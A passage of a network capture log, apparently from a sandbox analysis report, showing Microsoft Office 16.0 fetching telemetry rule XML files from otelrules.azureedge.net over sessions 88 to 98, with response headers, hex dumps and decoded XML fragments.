                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  88192.168.2.44983713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:18 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:19 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:18 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                  ETag: "0x8DC582B984BF177"
                                  x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154218Z-16547b76f7fp6mhthC1DFWrggn0000000fy000000000dg87
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:19 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  89192.168.2.44984313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:19 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:19 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:19 GMT
                                  Content-Type: text/xml
                                  Content-Length: 501
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                  ETag: "0x8DC582BACFDAACD"
                                  x-ms-request-id: f61ab913-a01e-006f-21a0-3413cd000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154219Z-15869dbbcc6xcpf8hC1DFWxtx00000000mzg000000000e1v
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:19 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  90192.168.2.44984413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:19 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:19 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:19 GMT
                                  Content-Type: text/xml
                                  Content-Length: 2592
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                  ETag: "0x8DC582BB5B890DB"
                                  x-ms-request-id: 682504c0-001e-005a-75d2-2cc3d0000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154219Z-16547b76f7f775p5hC1DFWzdvn0000000fx0000000002ftn
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:19 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  91192.168.2.44984513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:19 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:19 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:19 GMT
                                  Content-Type: text/xml
                                  Content-Length: 3342
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                  ETag: "0x8DC582B927E47E9"
                                  x-ms-request-id: f5036dc0-201e-0085-07a2-3434e3000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154219Z-17df447cdb5t94hvhC1DFWw9780000000cug000000002d91
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:19 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  92192.168.2.44984613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:19 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:19 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:19 GMT
                                  Content-Type: text/xml
                                  Content-Length: 2284
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                  ETag: "0x8DC582BCD58BEEE"
                                  x-ms-request-id: e8ae0579-a01e-00ab-7fa7-349106000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154219Z-15869dbbcc6rnr5chC1DFWwtp400000004h000000000cnnh
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:19 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  93192.168.2.44984713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:20 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:20 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1393
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                  ETag: "0x8DC582BE3E55B6E"
                                  x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154220Z-16547b76f7f7lhvnhC1DFWa2k00000000fp000000000kt91
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:20 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  94192.168.2.44984813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:20 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:21 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1356
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                  ETag: "0x8DC582BDC681E17"
                                  x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154220Z-16547b76f7f67wxlhC1DFWah9w0000000fxg000000000fq6
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:21 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  95192.168.2.44985013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:21 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:21 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1356
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                  ETag: "0x8DC582BDF66E42D"
                                  x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154221Z-16547b76f7fp46ndhC1DFW66zg0000000fyg000000003cw7
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:21 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  96192.168.2.44984913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:21 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:21 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1393
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                  ETag: "0x8DC582BE39DFC9B"
                                  x-ms-request-id: ebffffee-b01e-005c-69a0-344c66000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154221Z-17df447cdb5g2j9ghC1DFWuyag000000068000000000k968
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:21 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  97192.168.2.44985113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:21 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:21 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1395
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                  ETag: "0x8DC582BE017CAD3"
                                  x-ms-request-id: 791f1328-601e-003e-45a7-343248000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154221Z-17df447cdb5zfhrmhC1DFWh3300000000c7g000000003x7d
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:21 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  98192.168.2.44985213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:21 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:21 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:21 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1358
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                  ETag: "0x8DC582BE6431446"
                                  x-ms-request-id: bae79781-201e-0000-5fa1-34a537000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154221Z-15869dbbcc6lq45jhC1DFWtecs00000001p0000000001t6u
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:21 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  99192.168.2.44985413.107.246.45443
                                  TimestampBytes transferredDirectionData
